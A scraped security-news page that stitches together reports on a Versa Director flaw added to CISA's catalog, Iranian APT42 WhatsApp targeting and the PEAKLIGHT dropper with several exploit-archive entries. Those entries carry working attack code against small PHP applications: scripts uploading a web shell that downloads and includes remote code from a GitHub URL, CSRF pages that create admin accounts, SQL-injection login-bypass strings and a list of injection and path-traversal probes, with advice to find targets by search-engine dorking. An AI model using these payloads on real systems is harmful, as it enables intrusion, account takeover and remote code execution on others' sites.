The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has placed a security flaw impacting Versa Director to its Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation.
The medium-severity vulnerability, tracked as CVE-2024-39717 (CVSS score: 6.6), is case of file upload bug impacting the "Change Favicon" feature that could allow a threat actor to

Vulnerability / Government Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has placed a security flaw impacting Versa Director to its Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation.

The medium-severity vulnerability, tracked as CVE-2024-39717 (CVSS score: 6.6), is case of file upload bug impacting the "Change Favicon" feature that could allow a threat actor to upload a malicious file by masquerading it as a seemingly harmless PNG image file.

"The Versa Director GUI contains an unrestricted upload of file with dangerous type vulnerability that allows administrators with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin privileges to customize the user interface," CISA said in an advisory.

"The 'Change Favicon' (Favorite Icon) enables the upload of a .png file, which can be exploited to upload a malicious file with a .PNG extension disguised as an image."

However, a successful exploitation is possible only after a user with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin privileges has successfully authenticated and logged in.

While the exact circumstances surrounding the exploitation of CVE-2024-39717 is unclear, a description of the vulnerability in the NIST National Vulnerability Database (NVD) states that Versa Networks is aware of one confirmed instance in which a customer was targeted.

"The Firewall guidelines which were published in 2015 and 2017 were not implemented by that customer," the description states. "This non-implementation resulted in the bad actor being able to exploit this vulnerability without using the GUI."

Federal Civilian Executive Branch (FCEB) agencies are required to take steps to protect against the flaw by applying vendor-provided fixes by September 13, 2024.

The development comes days after CISA added four security shortcomings from 2021 and 2022 to its KEV catalog -

*   CVE-2021-33044 (CVSS score: 9.8) - Dahua IP Camera Authentication Bypass Vulnerability
*   CVE-2021-33045 (CVSS score: 9.8) - Dahua IP Camera Authentication Bypass Vulnerability
*   CVE-2021-31196 (CVSS score: 7.2) - Microsoft Exchange Server Information Disclosure Vulnerability
*   CVE-2022-0185 (CVSS score: 8.4) - Linux Kernel Heap-Based Buffer Overflow Vulnerability

It's worth noting that a China-linked threat actor codenamed UNC5174 (aka Uteus or Uetus) was attributed to the exploitation of CVE-2022-0185 by Google-owned Mandiant earlier this March.

CVE-2021-31196 was originally disclosed as part of a huge set of Microsoft Exchange Server vulnerabilities, collectively tracked as ProxyLogon, ProxyShell, ProxyToken, and ProxyOracle.

"CVE-2021-31196 has been observed in active exploitation campaigns, where threat actors target unpatched Microsoft Exchange Server instances," OP Innovate said. "These attacks typically aim to gain unauthorized access to sensitive information, escalate privileges, or deploy further payloads such as ransomware or malware."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Urges Federal Agencies to Patch Versa Director Vulnerability by September

Meta Platforms on Friday became the latest company after Microsoft, Google, and OpenAI to expose the activities of an Iranian state-sponsored threat actor, who it said used a set of WhatsApp accounts that attempted to target individuals in Israel, Palestine, Iran, the U.K., and the U.S.
The activity cluster, which originated from Iran, "appeared to have focused on political and diplomatic

Election Security / Threat Intelligence

Meta Platforms on Friday became the latest company after Microsoft, Google, and OpenAI to expose the activities of an Iranian state-sponsored threat actor, who it said used a set of WhatsApp accounts that attempted to target individuals in Israel, Palestine, Iran, the U.K., and the U.S.

The activity cluster, which originated from Iran, "appeared to have focused on political and diplomatic officials, and other public figures, including some associated with administrations of President Biden and former President Trump," Meta said.

The social media giant attributed it to a nation-state actor tracked as APT42, which is also known as Charming Kitten, Damselfly, Mint Sandstorm (formerly Phosphorus), TA453, and Yellow Garuda. It's assessed to be linked to Iran's Islamic Revolutionary Guard Corps (IRGC).

The adversarial collective is well-known for its use of sophisticated social engineering lures to spear-phish targets of interest with malware and steal their credentials. Earlier this week, Proofpoint revealed that the threat actor targeted a prominent Jewish figure to infect their machine with malware called AnvilEcho.

Meta said the "small cluster" of WhatsApp accounts masqueraded as technical support for AOL, Google, Yahoo, and Microsoft, although the efforts are believed to be unsuccessful. The accounts have since been blocked.

"We have not seen evidence that their accounts were compromised," the parent company of Facebook, Instagram, and WhatsApp said. "We have encouraged those who reported to us to take steps to ensure their online accounts are safe across the internet."

The development comes as the U.S. government formally accused Iran of attempting to undermine U.S. elections, stoke divisive opinion among the American public, and erode confidence in the electoral process by amplifying propaganda and gathering political intelligence.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Meta Exposes Iranian Hacker Group Targeting Global Political Figures on WhatsApp

Cybersecurity researchers have uncovered a never-before-seen dropper that serves as a conduit to launch next-stage malware with the ultimate goal of infecting Windows systems with information stealers and loaders.

"This memory-only dropper decrypts and executes a PowerShell-based downloader," Google-owned Mandiant said. "This PowerShell-based downloader is being tracked as PEAKLIGHT."

Some of

Malware / Threat Intelligence

Cybersecurity researchers have uncovered a never-before-seen dropper that serves as a conduit to launch next-stage malware with the ultimate goal of infecting Windows systems with information stealers and loaders.

"This memory-only dropper decrypts and executes a PowerShell-based downloader," Google-owned Mandiant said. "This PowerShell-based downloader is being tracked as PEAKLIGHT."

Some of the malware strains distributed using this technique are Lumma Stealer, Hijack Loader (aka DOILoader, IDAT Loader, or SHADOWLADDER), and CryptBot, all of which are advertised under the malware-as-a-service (SaaS) model.

The starting point of the attack chain is a Windows shortcut (LNK) file that's downloaded via drive-by download techniques -- e.g., when users look up a movie on search engines. It's worth pointing out that the LNK files are distributed within ZIP archives that are disguised as pirated movies.

The LNK file connects to a content delivery network (CDN) hosting an obfuscated memory-only JavaScript dropper. The dropper subsequently executes the PEAKLIGHT PowerShell downloader script on the host, which then reaches out to a command-and-control (C2) server to fetch additional payloads.

Mandiant said it identified different variations of the LNK files, some of which leverage asterisks (\*) as wildcards to launch the legitimate mshta.exe binary to discreetly run malicious code (i.e., the dropper) retrieved from a remote server.

In a similar vein, the droppers have been found to embed both hex-encoded and Base64-encoded PowerShell payloads that are eventually unpacked to execute PEAKLIGHT, which is designed to deliver next-stage malware on a compromised system while simultaneously downloading a legitimate movie trailer, likely as a ruse.

"PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that checks for the presence of ZIP archives in hard-coded file paths," Mandiant researchers Aaron Lee and Praveeth D'Souza said.

"If the archives do not exist, the downloader will reach out to a CDN site and download the remotely hosted archive file and save it to disk."

The disclosure comes as Malwarebytes detailed a malvertising campaign that employs fraudulent Google Search ads for Slack, an enterprise communications platform, to direct users to phony websites hosting malicious installers that culminate in the deployment of a remote access trojan named SectopRAT.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New PEAKLIGHT Dropper Deployed in Attacks Targeting Windows with Malicious Movie Downloads

Crime Complaints Reporting Management System version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Crime Complaints Reporting Management System 1.0 code injection Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php target.com[+] payload :<?phpfunction file_upload($website) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(      'action' => '',        'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',        'contact' => '00213771818860',        'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'about' => 'Hacked By Indoushka',        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "$website/admin/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: $website/admin/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <website URL>\n";    echo "(+) Example: php " . $argv[0] . " http://example.com\n";    exit(-1);}$website = $argv[1];file_upload($website);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Crime Complaints Reporting Management System 1.0 Shell Upload

Courier Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Courier Management System 1.0 CSRF add admin Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 6.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://127.0.0.1/courier/ajax.php?action=save_user", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"email\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Courier Management System 1.0 Cross Site Request Forgery

Company Visitor Management version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Company Visitor Management 1.0 Auth By Pass Vulnerability                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2019/04/Company-Visitor-Management-System-PHP.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/cvms/index.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Company Visitor Management 1.0 SQL Injection

CMSsite version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : CMSsite 1.0 php code injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://github.com/VictorAlagwu/CMSsite/archive/master.zip                                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 31    Line 40  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(        'create_post' => '',        'post_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'post_title' => 'inouva',        'post_category_id' => '123',        'post_tags' => '99',        'post_content' => 'N0_name',        'post_status' => 'Hackers',        'qty' => '1'    );    echo "(+) PHP Code Injection ...\n";    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/CMSsite-master/admin/posts.php?source=add_post");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/CMSsite-master/img/$file_name\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);[+] Path : http://127.0.0.1/CMSsite-master/img/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

CMSsite 1.0 Shell Upload

CMS RIMI version 1.3 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

=============================================================================================================================================  
| # Title     : CMS RIMI v1.3 CSRF Vulnerability                                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://github.com/myroot593/RIMICMS                                                                                        |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Profile User Form</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">  
          
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required>

          
        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required>

          
        <label for="confirm_password">Confirm Password:</label>  
        <input type="password" id="confirm_password" name="confirm_password" required>

          
        <label for="nama">Nama:</label>  
        <input type="text" id="nama" name="nama" required>

          
        <label for="email">Email:</label>  
        <input type="email" id="email" name="email" required>

          
        <input type="hidden" name="id" value="">

          
        <button type="submit">Submit</button>  
    </form>  
</body>  
</html>

------------------ [+] Part 2 arbitrary file upload file uplaod [+] -------------

[+] Go to the line 3.

[+] Set the target site link Save changes and apply .

[+] Your file : 127.0.0.1/cmsrimi/content 

[+] save code as poc.html .

<p class="sukses-form"></p>  
<p class="error-form"></p>  
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">  
  <div class="form-group ">  
      <label>Judul :</label>  
      <input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">  
      <span><p class="error-form"></p></span>  
  </div>  
  <div class="form-group ">  
    <label>Isi Berita :</label>  
    <textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea>  
    <span><p class="error-form"></p></span>  
  </div>  
  <div class="form-group">  
    <label>Kategori Berita :</label>  
    <select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select>  <p class="error-form"></p>  
  </div>  
  <div class="form-group">  
    <label>Status:</label>  
    <select class="form-control" name="status_berita" id="status_berita">  
      <option value="Diterbitkan">Diterbitkan</option>  
      <option value="Draft">Draft</option>  
    </select>  
  </div>  
  <div class="form-group">  
      <label>Gambar Berita</label>  
      <input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">  
      <input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">  
  <p class="error-form"></p>  
  </div>  
  <button type="submit" class="btn btn-primary">Submit</button>  
</form>  
  <p class="error-form"></p>    
  <p class="error-form"></p>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

CMS RIMI 1.3 Cross Site Request Forgery / File Upload

Client Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Client ms Project 1.0 Auth By Pass Vulnerability                                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/client-management-system-using-php-mysql/                                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/CCMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Client Management System 1.0 SQL Injection

CCMS Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : CCMS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/                                                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/CCMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#google